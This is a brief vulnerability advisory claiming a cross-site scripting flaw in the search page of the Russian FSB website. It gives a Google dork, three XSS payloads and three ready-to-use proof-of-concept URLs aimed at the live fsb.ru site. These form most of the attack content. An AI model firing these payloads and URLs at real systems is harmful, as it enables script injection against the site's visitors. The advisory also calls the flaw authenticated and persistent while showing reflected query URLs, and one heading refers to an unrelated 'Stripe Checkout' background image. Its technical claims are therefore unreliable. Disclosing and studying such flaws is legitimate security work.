Headline
Russian FSB Cross Site Scripting
The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.
/*!
VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation
Authenticated Persistent XSS
GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=
DATE: 2024-11-29
SECURITY RESEARCHER: E1.Coders
VENDOR: FSB [ http://www.fsb.ru/ ]
SOFTWARE LINK: http://www.fsb.ru/
CVSS: AV:N/AC:L/PR:H/UI:N/S:C
CWE: CWE-79
*/
– [ Info: ]
[i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.
[i] Vulnerable parameter(s): sh.htm?query= < AND > /fsb/sh.htm?query=
– [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
– [ Payloads: ]
`"’><img src=xxx:x \x22onerror=javascript:alert(1)>
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
`"’><img src=xxx:x onerror\x09=javascript:alert(1)>
– [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]
http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E
http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E
http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E
– [ Contacts: ]
[+] E-Mail: [email protected]
[+] GitHub: @e1coders